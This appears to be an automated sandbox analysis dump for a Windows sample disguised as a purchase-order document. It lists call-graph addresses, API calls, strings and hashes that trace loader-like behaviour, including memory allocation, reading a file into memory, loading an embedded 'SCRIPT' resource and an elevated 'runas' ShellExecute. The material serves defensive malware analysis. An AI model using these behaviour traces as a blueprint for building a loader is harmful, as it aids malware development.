97938->97905 97938->97933 97941 174c07 CallCatchBlock 97940->97941 97959 172f5e EnterCriticalSection 97941->97959 97943 174c0e 97960 1750af 97943->97960 97945 174c1d 97951 174c2c 97945->97951 97973 174a8f 29 API calls 97945->97973 97948 174c27 97974 174b45 GetStdHandle GetFileType 97948->97974 97949 174c3d __wsopen_s 97949->97935 97975 174c48 LeaveCriticalSection _abort 97951->97975 97953 160a97 IsProcessorFeaturePresent 97952->97953 97954 160a95 97952->97954 97956 160c5d 97953->97956 97954->97938 97988 160c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97956->97988 97958 160d40 97958->97938 97959->97943 97961 1750bb CallCatchBlock 97960->97961 97962 1750df 97961->97962 97963 1750c8 97961->97963 97976 172f5e EnterCriticalSection 97962->97976 97984 16f2d9 20 API calls _abort 97963->97984 97966 1750cd 97985 1727ec 26 API calls _abort 97966->97985 97967 1750eb 97972 175117 97967->97972 97977 175000 97967->97977 97969 1750d7 __wsopen_s 97969->97945 97986 17513e LeaveCriticalSection _abort 97972->97986 97973->97948 97974->97951 97975->97949 97976->97967 97978 174c7d _abort 20 API calls 97977->97978 97983 175012 97978->97983 97979 17501f 97980 1729c8 _free 20 API calls 97979->97980 97982 175071 97980->97982 97982->97967 97983->97979 97987 173405 11 API calls 2 library calls 97983->97987 97984->97966 97985->97969 97986->97969 97987->97983 97988->97958 97990 16096c GetStartupInfoW 97989->97990 97990->97920 97991 14105b 97996 14344d 97991->97996 97993 14106a 98027 1600a3 29 API calls __onexit 97993->98027 97995 141074 97997 14345d __wsopen_s 97996->97997 97998 14a961 22 API calls 97997->97998 97999 143513 97998->97999 98000 143a5a 24 API calls 97999->98000 98001 14351c 98000->98001 98028 143357 98001->98028 98004 1433c6 22 API calls 98005 143535 98004->98005 98006 14515f 22 API calls 98005->98006 98007 143544 98006->98007 98008 14a961 22 API calls 98007->98008 98009 14354d 98008->98009 98010 14a6c3 22 API calls 98009->98010 98011 143556 RegOpenKeyExW 98010->98011 98012 183176 RegQueryValueExW 98011->98012 98017 143578 98011->98017 98013 18320c RegCloseKey 98012->98013 98014 183193 98012->98014 98013->98017 98020 18321e _wcslen 98013->98020 98015 15fe0b 22 API calls 98014->98015 98016 1831ac 98015->98016 98019 145722 22 API calls 98016->98019 98017->97993 98018 144c6d 22 API calls 98018->98020 98021 1831b7 RegQueryValueExW 98019->98021 98020->98017 98020->98018 98025 149cb3 22 API calls 98020->98025 98026 14515f 22 API calls 98020->98026 98022 1831d4 98021->98022 98024 1831ee ISource 98021->98024 98023 146b57 22 API calls 98022->98023 98023->98024 98024->98013 98025->98020 98026->98020 98027->97995 98029 181f50 __wsopen_s 98028->98029 98030 143364 GetFullPathNameW 98029->98030 98031 143386 98030->98031 98032 146b57 22 API calls 98031->98032 98033 1433a4 98032->98033 98033->98004 98034 f4d2bb 98037 f4cf30 98034->98037 98036 f4d307 98038 f4a960 GetPEB 98037->98038 98047 f4cfcf 98038->98047 98040 f4d000 CreateFileW 98042 f4d00d 98040->98042 98040->98047 98041 f4d029 VirtualAlloc 98041->98042 98043 f4d04a ReadFile 98041->98043 98044 f4d21c VirtualFree 98042->98044 98045 f4d22a 98042->98045 98043->98042 98046 f4d068 VirtualAlloc 98043->98046 98044->98045 98045->98036 98046->98042 98046->98047 98047->98041 98047->98042 98048 f4d130 CloseHandle 98047->98048 98049 f4d140 VirtualFree 98047->98049 98050 f4de40 GetPEB 98047->98050 98048->98047 98049->98047 98051 f4de6a 98050->98051 98051->98040 98052 141044 98057 1410f3 98052->98057 98054 14104a 98093 1600a3 29 API calls __onexit 98054->98093 98056 141054 98094 141398 98057->98094 98061 14116a 98062 14a961 22 API calls 98061->98062 98063 141174 98062->98063 98064 14a961 22 API calls 98063->98064 98065 14117e 98064->98065 98066 14a961 22 API calls 98065->98066 98067 141188 98066->98067 98068 14a961 22 API calls 98067->98068 98069 1411c6 98068->98069 98070 14a961 22 API calls 98069->98070 98071 141292 98070->98071 98104 14171c 98071->98104 98075 1412c4 98076 14a961 22 API calls 98075->98076 98077 1412ce 98076->98077 98078 151940 9 API calls 98077->98078 98079 1412f9 98078->98079 98125 141aab 98079->98125 98081 141315 98082 141325 GetStdHandle 98081->98082 98083 182485 98082->98083 98084 14137a 98082->98084 98083->98084 98085 18248e 98083->98085 98087 141387 OleInitialize 98084->98087 98086 15fddb 22 API calls 98085->98086 98088 182495 98086->98088 98087->98054 98132 1b011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 98088->98132 98090 18249e 98133 1b0944 CreateThread 98090->98133 98092 1824aa CloseHandle 98092->98084 98093->98056 98134 1413f1 98094->98134 98097 1413f1 22 API calls 98098 1413d0 98097->98098 98099 14a961 22 API calls 98098->98099 98100 1413dc 98099->98100 98101 146b57 22 API calls 98100->98101 98102 141129 98101->98102 98103 141bc3 6 API calls 98102->98103 98103->98061 98105 14a961 22 API calls 98104->98105 98106 14172c 98105->98106 98107 14a961 22 API calls 98106->98107 98108 141734 98107->98108 98109 14a961 22 API calls 98108->98109 98110 14174f 98109->98110 98111 15fddb 22 API calls 98110->98111 98112 14129c 98111->98112 98113 141b4a 98112->98113 98114 141b58 98113->98114 98115 14a961 22 API calls 98114->98115 98116 141b63 98115->98116 98117 14a961 22 API calls 98116->98117 98118 141b6e 98117->98118 98119 14a961 22 API calls 98118->98119 98120 141b79 98119->98120 98121 14a961 22 API calls 98120->98121 98122 141b84 98121->98122 98123 15fddb 22 API calls 98122->98123 98124 141b96 RegisterWindowMessageW 98123->98124 98124->98075 98126 18272d 98125->98126 98127 141abb 98125->98127 98141 1b3209 23 API calls 98126->98141 98128 15fddb 22 API calls 98127->98128 98130 141ac3 98128->98130 98130->98081 98131 182738 98132->98090 98133->98092 98142 1b092a 28 API calls 98133->98142 98135 14a961 22 API calls 98134->98135 98136 1413fc 98135->98136 98137 14a961 22 API calls 98136->98137 98138 141404 98137->98138 98139 14a961 22 API calls 98138->98139 98140 1413c6 98139->98140 98140->98097 98141->98131 98143 14dee5 98146 14b710 98143->98146 98147 14b72b 98146->98147 98148 1900f8 98147->98148 98149 190146 98147->98149 98174 14b750 98147->98174 98152 190102 98148->98152 98154 19010f 98148->98154 98148->98174 98188 1c58a2 207 API calls 2 library calls 98149->98188 98186 1c5d33 207 API calls 98152->98186 98172 14ba20 98154->98172 98187 1c61d0 207 API calls 2 library calls 98154->98187 98159 1903d9 98159->98159 98161 15d336 40 API calls 98161->98174 98162 14ba4e 98164 190322 98191 1c5c0c 82 API calls 98164->98191 98171 14bbe0 40 API calls 98171->98174 98172->98162 98192 1b359c 82 API calls __wsopen_s 98172->98192 98173 14ec40 207 API calls 98173->98174 98174->98161 98174->98162 98174->98164 98174->98171 98174->98172 98174->98173 98175 14a8c7 22 API calls 98174->98175 98177 14a81b 41 API calls 98174->98177 98178 15d2f0 40 API calls 98174->98178 98179 15a01b 207 API calls 98174->98179 98180 160242 5 API calls __Init_thread_wait 98174->98180 98181 15edcd 22 API calls 98174->98181 98182 1600a3 29 API calls __onexit 98174->98182 98183 1601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98174->98183 98184 15ee53 82 API calls 98174->98184 98185 15e5ca 207 API calls 98174->98185 98189 14aceb 23 API calls ISource 98174->98189 98190 19f6bf 23 API calls 98174->98190 98175->98174 98177->98174 98178->98174 98179->98174 98180->98174 98181->98174 98182->98174 98183->98174 98184->98174 98185->98174 98186->98154 98187->98172 98188->98174 98189->98174 98190->98174 98191->98172 98192->98159 98193 178402 98198 1781be 98193->98198 98196 17842a 98203 1781ef try_get_first_available_module 98198->98203 98200 1783ee 98217 1727ec 26 API calls _abort 98200->98217 98202 178343 98202->98196 98210 180984 98202->98210 98206 178338 98203->98206 98213 168e0b 40 API calls 2 library calls 98203->98213 98205 17838c 98205->98206 98214 168e0b 40 API calls 2 library calls 98205->98214 98206->98202 98216 16f2d9 20 API calls _abort 98206->98216 98208 1783ab 98208->98206 98215 168e0b 40 API calls 2 library calls 98208->98215 98218 180081 98210->98218 98212 18099f 98212->98196 98213->98205 98214->98208 98215->98206 98216->98200 98217->98202 98221 18008d CallCatchBlock 98218->98221 98219 18009b 98276 16f2d9 20 API calls _abort 98219->98276 98221->98219 98223 1800d4 98221->98223 98222 1800a0 98277 1727ec 26 API calls _abort 98222->98277 98229 18065b 98223->98229 98228 1800aa __wsopen_s 98228->98212 98279 18042f 98229->98279 98232 18068d 98311 16f2c6 20 API calls _abort 98232->98311 98233 1806a6 98297 175221 98233->98297 98236 180692 98312 16f2d9 20 API calls _abort 98236->98312 98237 1806ab 98238 1806cb 98237->98238 98239 1806b4 98237->98239 98310 18039a CreateFileW 98238->98310 98313 16f2c6 20 API calls _abort 98239->98313 98243 1806b9 98314 16f2d9 20 API calls _abort 98243->98314 98244 180781 GetFileType 98247 18078c GetLastError 98244->98247 98248 1807d3 98244->98248 98246 180756 GetLastError 98316 16f2a3 20 API calls 2 library calls 98246->98316 98317 16f2a3 20 API calls 2 library calls 98247->98317 98319 17516a 21 API calls 3 library calls 98248->98319 98249 180704 98249->98244 98249->98246 98315 18039a CreateFileW 98249->98315 98253 18079a CloseHandle 98253->98236 98256 1807c3 98253->98256 98255 180749 98255->98244 98255->98246 98318 16f2d9 20 API calls _abort 98256->98318 98257 1807f4 98262 180840 98257->98262 98320 1805ab 72 API calls 4 library calls 98257->98320 98259 1807c8 98259->98236 98264 18086d 98262->98264 98321 18014d 72 API calls 4 library calls 98262->98321 98263 180866 98263->98264 98265 18087e 98263->98265 98266 1786ae __wsopen_s 29 API calls 98264->98266 98267 1800f8 98265->98267 98268 1808fc CloseHandle 98265->98268 98266->98267 98278 180121 LeaveCriticalSection __wsopen_s 98267->98278 98322 18039a CreateFileW 98268->98322 98270 180927 98271 180931 GetLastError 98270->98271 98272 18095d 98270->98272 98323 16f2a3 20 API calls 2 library calls 98271->98323 98272->98267 98274 18093d 98324 175333 21 API calls 3 library calls 98274->98324 98276->98222 98277->98228 98278->98228 98280 180450 98279->98280 98281 18046a 98279->98281 98280->98281 98332 16f2d9 20 API calls _abort 98280->98332 98325 1803bf 98281->98325 98284 18045f 98333 1727ec 26 API calls _abort 98284->98333 98286 1804a2 98287 1804d1 98286->98287 98334 16f2d9 20 API calls _abort 98286->98334 98295 180524 98287->98295 98336 16d70d 26 API calls 2 library calls 98287->98336 98290 18051f 98292 18059e 98290->98292 98290->98295 98291 1804c6 98335 1727ec 26 API calls _abort 98291->98335 98337 1727fc 11 API calls _abort 98292->98337 98295->98232 98295->98233 98296 1805aa 98298 17522d CallCatchBlock 98297->98298 98340 172f5e EnterCriticalSection 98298->98340 98300 17527b 98341 17532a 98300->98341 98301 175259 98303 175000 __wsopen_s 21 API calls 98301->98303 98306 17525e 98303->98306 98304 1752a4 __wsopen_s 98304->98237 98305 175234 98305->98300 98305->98301 98307 1752c7 EnterCriticalSection 98305->98307 98306->98300 98344 175147 EnterCriticalSection 98306->98344 98307->98300 98308 1752d4 LeaveCriticalSection 98307->98308 98308->98305 98310->98249 98311->98236 98312->98267 98313->98243 98314->98236 98315->98255 98316->98236 98317->98253 98318->98259 98319->98257 98320->98262 98321->98263 98322->98270 98323->98274 98324->98272 98327 1803d7 98325->98327 98326 1803f2 98326->98286 98327->98326 98338 16f2d9 20 API calls _abort 98327->98338 98329 180416 98339 1727ec 26 API calls _abort 98329->98339 98331 180421 98331->98286 98332->98284 98333->98281 98334->98291 98335->98287 98336->98290 98337->98296 98338->98329 98339->98331 98340->98305 98345 172fa6 LeaveCriticalSection 98341->98345 98343 175331 98343->98304 98344->98300 98345->98343 98346 142de3 98347 142df0 __wsopen_s 98346->98347 98348 182c2b ___scrt_fastfail 98347->98348 98349 142e09 98347->98349 98351 182c47 GetOpenFileNameW 98348->98351 98350 143aa2 23 API calls 98349->98350 98352 142e12 98350->98352 98353 182c96 98351->98353 98362 142da5 98352->98362 98355 146b57 22 API calls 98353->98355 98357 182cab 98355->98357 98357->98357 98359 142e27 98380 1444a8 98359->98380 98363 181f50 __wsopen_s 98362->98363 98364 142db2 GetLongPathNameW 98363->98364 98365 146b57 22 API calls 98364->98365 98366 142dda 98365->98366 98367 143598 98366->98367 98368 14a961 22 API calls 98367->98368 98369 1435aa 98368->98369 98370 143aa2 23 API calls 98369->98370 98371 1435b5 98370->98371 98372 1832eb 98371->98372 98373 1435c0 98371->98373 98378 18330d 98372->98378 98416 15ce60 41 API calls 98372->98416 98375 14515f 22 API calls 98373->98375 98376 1435cc 98375->98376 98410 1435f3 98376->98410 98379 1435df 98379->98359 98381 144ecb 94 API calls 98380->98381 98382 1444cd 98381->98382 98383 183833 98382->98383 98384 144ecb 94 API calls 98382->98384 98385 1b2cf9 80 API calls 98383->98385 98386 1444e1 98384->98386 98387 183848 98385->98387 98386->98383 98388 1444e9 98386->98388 98389 183869 98387->98389 98390 18384c 98387->98390 98393 1444f5 98388->98393 98394 183854 98388->98394 98392 15fe0b 22 API calls 98389->98392 98391 144f39 68 API calls 98390->98391 98391->98394 98409 1838ae 98392->98409 98432 14940c 136 API calls 2 library calls 98393->98432 98433 1ada5a 82 API calls 98394->98433 98397 183862 98397->98389 98398 142e31 98399 183a5f 98404 183a67 98399->98404 98400 144f39 68 API calls 98400->98404 98401 14a4a1 22 API calls 98401->98409 98404->98400 98435 1a989b 82 API calls __wsopen_s 98404->98435 98406 149cb3 22 API calls 98406->98409 98409->98399 98409->98401 98409->98404 98409->98406 98417 1a967e 98409->98417 98420 1b0b5a 98409->98420 98426 143ff7 98409->98426 98434 1a95ad 42 API calls _wcslen 98409->98434 98411 143605 98410->98411 98415 143624 __fread_nolock 98410->98415 98413 15fe0b 22 API calls 98411->98413 98412 15fddb 22 API calls 98414 14363b 98412->98414 98413->98415 98414->98379 98415->98412 98416->98372 98418 15fe0b 22 API calls 98417->98418 98419 1a96ae __fread_nolock 98418->98419 98419->98409 98421 1b0b65 98420->98421 98422 15fddb 22 API calls 98421->98422 98423 1b0b7c 98422->98423 98424 149cb3 22 API calls 98423->98424 98425 1b0b87 98424->98425 98425->98409 98427 14400a 98426->98427 98429 1440ae 98426->98429 98428 15fe0b 22 API calls 98427->98428 98431 14403c 98427->98431 98428->98431 98429->98409 98430 15fddb 22 API calls 98430->98431 98431->98429 98431->98430 98432->98398 98433->98397 98434->98409 98435->98404 98436 193a41 98440 1b10c0 98436->98440 98438 193a4c 98439 1b10c0 53 API calls 98438->98439 98439->98438 98446 1b10fa 98440->98446 98448 1b10cd 98440->98448 98441 1b10fc 98452 15fa11 53 API calls 98441->98452 98443 1b1101 98444 147510 53 API calls 98443->98444 98445 1b1108 98444->98445 98447 146350 22 API calls 98445->98447 98446->98438 98447->98446 98448->98441 98448->98443 98448->98446 98449 1b10f4 98448->98449 98451 14b270 39 API calls 98449->98451 98451->98446 98452->98443 98453 192a00 98462 14d7b0 ISource 98453->98462 98454 14d9d5 98455 14db11 PeekMessageW 98455->98462 98456 14d807 GetInputState 98456->98455 98456->98462 98458 191cbe TranslateAcceleratorW 98458->98462 98459 14da04 timeGetTime 98459->98462 98460 14db73 TranslateMessage DispatchMessageW 98461 14db8f PeekMessageW 98460->98461 98461->98462 98462->98454 98462->98455 98462->98456 98462->98458 98462->98459 98462->98460 98462->98461 98463 14dbaf Sleep 98462->98463 98464 192b74 Sleep 98462->98464 98466 191dda timeGetTime 98462->98466 98481 14ec40 207 API calls 98462->98481 98482 151310 207 API calls 98462->98482 98485 14dd50 98462->98485 98492 14dfd0 98462->98492 98515 14bf40 207 API calls 2 library calls 98462->98515 98516 15edf6 IsDialogMessageW GetClassLongW 98462->98516 98518 1b3a2a 23 API calls 98462->98518 98519 1b359c 82 API calls __wsopen_s 98462->98519 98465 14dbc0 98463->98465 98464->98465 98465->98454 98465->98462 98467 15e551 timeGetTime 98465->98467 98470 192c0b GetExitCodeProcess 98465->98470 98474 192a31 98465->98474 98475 1d29bf GetForegroundWindow 98465->98475 98476 192ca9 Sleep 98465->98476 98520 1c5658 23 API calls 98465->98520 98521 1ae97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98465->98521 98522 1ad4dc 47 API calls 98465->98522 98517 15e300 23 API calls 98466->98517 98467->98465 98472 192c21 WaitForSingleObject 98470->98472 98473 192c37 CloseHandle 98470->98473 98472->98462 98472->98473 98473->98465 98474->98454 98475->98465 98476->98462 98481->98462 98482->98462 98486 14dd83 98485->98486 98487 14dd6f 98485->98487 98524 1b359c 82 API calls __wsopen_s 98486->98524 98523 14d260 207 API calls 2 library calls 98487->98523 98489 14dd7a 98489->98462 98491 192f75 98491->98491 98493 14e010 98492->98493 98511 14e0dc ISource 98493->98511 98527 160242 5 API calls __Init_thread_wait 98493->98527 98496 192fca 98498 14a961 22 API calls 98496->98498 98496->98511 98497 14a961 22 API calls 98497->98511 98499 192fe4 98498->98499 98528 1600a3 29 API calls __onexit 98499->98528 98503 192fee 98529 1601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98503->98529 98506 14ec40 207 API calls 98506->98511 98508 14a8c7 22 API calls 98508->98511 98509 14e3e1 98509->98462 98510 1504f0 22 API calls 98510->98511 98511->98497 98511->98506 98511->98508 98511->98509 98511->98510 98514 1b359c 82 API calls 98511->98514 98525 14a81b 41 API calls 98511->98525 98526 15a308 207 API calls 98511->98526 98530 160242 5 API calls __Init_thread_wait 98511->98530 98531 1600a3 29 API calls __onexit 98511->98531 98532 1601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98511->98532 98533 1c47d4 207 API calls 98511->98533 98534 1c68c1 207 API calls 98511->98534 98514->98511 98515->98462 98516->98462 98517->98462 98518->98462 98519->98462 98520->98465 98521->98465 98522->98465 98523->98489 98524->98491 98525->98511 98526->98511 98527->98496 98528->98503 98529->98511 98530->98511 98531->98511 98532->98511 98533->98511 98534->98511 98535 141cad SystemParametersInfoW 98536 182ba5 98537 142b25 98536->98537 98538 182baf 98536->98538 98564 142b83 7 API calls 98537->98564 98540 143a5a 24 API calls 98538->98540 98542 182bb8 98540->98542 98544 149cb3 22 API calls 98542->98544 98546 182bc6 98544->98546 98545 142b2f 98549 142b44 98545->98549 98551 143837 49 API calls 98545->98551 98547 182bce 98546->98547 98548 182bf5 98546->98548 98550 1433c6 22 API calls 98547->98550 98552 1433c6 22 API calls 98548->98552 98556 142b5f 98549->98556 98568 1430f2 Shell_NotifyIconW ___scrt_fastfail 98549->98568 98553 182bd9 98550->98553 98551->98549 98563 182bf1 GetForegroundWindow ShellExecuteW 98552->98563 98554 146350 22 API calls 98553->98554 98557 182be7 98554->98557 98561 142b66 SetCurrentDirectoryW 98556->98561 98560 1433c6 22 API calls 98557->98560 98558 182c26 98558->98556 98560->98563 98562 142b7a 98561->98562 98563->98558 98569 142cd4 7 API calls 98564->98569 98566 142b2a 98567 142c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98566->98567 98567->98545 98568->98556 98569->98566

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 234 1442de-14434d call 14a961 GetVersionExW call 146b57 239 144353 234->239 240 183617-18362a 234->240 241 144355-144357 239->241 242 18362b-18362f 240->242 243 14435d-1443bc call 1493b2 call 1437a0 241->243 244 183656 241->244 245 183631 242->245 246 183632-18363e 242->246 262 1443c2-1443c4 243->262 263 1837df-1837e6 243->263 249 18365d-183660 244->249 245->246 246->242 248 183640-183642 246->248 248->241 251 183648-18364f 248->251 252 183666-1836a8 249->252 253 14441b-144435 GetCurrentProcess IsWow64Process 249->253 251->240 255 183651 251->255 252->253 256 1836ae-1836b1 252->256 258 144494-14449a 253->258 259 144437 253->259 255->244 260 1836db-1836e5 256->260 261 1836b3-1836bd 256->261 264 14443d-144449 258->264 259->264 268 1836f8-183702 260->268 269 1836e7-1836f3 260->269 265 1836ca-1836d6 261->265 266 1836bf-1836c5 261->266 262->249 267 1443ca-1443dd 262->267 270 1837e8 263->270 271 183806-183809 263->271 272 14444f-14445e LoadLibraryA 264->272 273 183824-183828 GetSystemInfo 264->273 265->253 266->253 276 1443e3-1443e5 267->276 277 183726-18372f 267->277 279 183704-183710 268->279 280 183715-183721 268->280 269->253 278 1837ee 270->278 281 18380b-18381a 271->281 282 1837f4-1837fc 271->282 274 144460-14446e GetProcAddress 272->274 275 14449c-1444a6 GetSystemInfo 272->275 274->275 283 144470-144474 GetNativeSystemInfo 274->283 284 144476-144478 275->284 285 18374d-183762 276->285 286 1443eb-1443ee 276->286 287 18373c-183748 277->287 288 183731-183737 277->288 278->282 279->253 280->253 281->278 289 18381c-183822 281->289 282->271 283->284 292 144481-144493 284->292 293 14447a-14447b FreeLibrary 284->293 290 18376f-18377b 285->290 291 183764-18376a 285->291 294 1443f4-14440f 286->294 295 183791-183794 286->295 287->253 288->253 289->282 290->253 291->253 293->292 297 144415 294->297 298 183780-18378c 294->298 295->253 296 18379a-1837c1 295->296 299 1837ce-1837da 296->299 300 1837c3-1837c9 296->300 297->253 298->253 299->253 300->253
                                                                                    APIs
                                                                                    • GetVersionExW.KERNEL32(?), ref: 0014430D
                                                                                      • Part of subcall function 00146B57: _wcslen.LIBCMT ref: 00146B6A
                                                                                    • GetCurrentProcess.KERNEL32(?,001DCB64,00000000,?,?), ref: 00144422
                                                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00144429
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00144454
                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00144466
                                                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00144474
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0014447B
                                                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 001444A0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                    • API String ID: 3290436268-3101561225
                                                                                    • Opcode ID: b1ad9c8795d6014eb96b83267237341a534f071edab4a02c9d9efb826878949f
                                                                                    • Instruction ID: 74a03edb0a0015d1920fcd8189615d1a0b2f188872c7bce5a95707bfeeba449e
                                                                                    • Opcode Fuzzy Hash: b1ad9c8795d6014eb96b83267237341a534f071edab4a02c9d9efb826878949f
                                                                                    • Instruction Fuzzy Hash: 0BA1D46190A2D4CFCB15D7687C4C3D97FA46B36700B1CC8DAE27193A79DB3146A4CB61

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1270 1442a2-1442ba CreateStreamOnHGlobal 1271 1442bc-1442d3 FindResourceExW 1270->1271 1272 1442da-1442dd 1270->1272 1273 1835ba-1835c9 LoadResource 1271->1273 1274 1442d9 1271->1274 1273->1274 1275 1835cf-1835dd SizeofResource 1273->1275 1274->1272 1275->1274 1276 1835e3-1835ee LockResource 1275->1276 1276->1274 1277 1835f4-1835fc 1276->1277 1278 183600-183612 1277->1278 1278->1274
                                                                                    APIs
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,001450AA,?,?,00000000,00000000), ref: 001442B2
                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001450AA,?,?,00000000,00000000), ref: 001442C9
                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,001450AA,?,?,00000000,00000000,?,?,?,?,?,?,00144F20), ref: 001835BE
                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,001450AA,?,?,00000000,00000000,?,?,?,?,?,?,00144F20), ref: 001835D3
                                                                                    • LockResource.KERNEL32(001450AA,?,?,001450AA,?,?,00000000,00000000,?,?,?,?,?,?,00144F20,?), ref: 001835E6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                    • String ID: SCRIPT
                                                                                    • API String ID: 3051347437-3967369404
                                                                                    • Opcode ID: f0ec60015a511fb7322c291f0113e54b8e48c2face4de46b32436dacd25ed868
                                                                                    • Instruction ID: b830b4bb7428af1d13fb697ab4139691a0ca3471ae15e9ebb2317921b9a543d8
                                                                                    • Opcode Fuzzy Hash: f0ec60015a511fb7322c291f0113e54b8e48c2face4de46b32436dacd25ed868
                                                                                    • Instruction Fuzzy Hash: A1118EB0202701BFDB218BA5EC48F677BB9EBC5B51F14456EF442D66A0DBB1DC41CA60

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00142B6B
                                                                                      • Part of subcall function 00143A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00211418,?,00142E7F,?,?,?,00000000), ref: 00143A78
                                                                                      • Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD
                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,?,?,00202224), ref: 00182C10
                                                                                    • ShellExecuteW.SHELL32(00000000,?,?,00202224), ref: 00182C17
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                    • String ID: runas
                                                                                    • API String ID: 448630720-4000483414
                                                                                    • Opcode ID: b52dffc5f52686b5561cd7a6d08fcfd9e730bca3f489d1d7a816cb2a96e15f89
                                                                                    • Instruction ID: c5f9640444f3808b05de9fbc0ddf77db07d28595759662aa469e6f1400564307
                                                                                    • Opcode Fuzzy Hash: b52dffc5f52686b5561cd7a6d08fcfd9e730bca3f489d1d7a816cb2a96e15f89
                                                                                    • Instruction Fuzzy Hash: 42110331209306AAC704FF60E8559AEB7A4AFB1700F84042DF196130B3CF318A99C752
                                                                                    APIs
                                                                                    • GetInputState.USER32 ref: 0014D807
                                                                                    • timeGetTime.WINMM ref: 0014DA07
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0014DB28
                                                                                    • TranslateMessage.USER32(?), ref: 0014DB7B
                                                                                    • DispatchMessageW.USER32(?), ref: 0014DB89
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0014DB9F
                                                                                    • Sleep.KERNEL32(0000000A), ref: 0014DBB1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
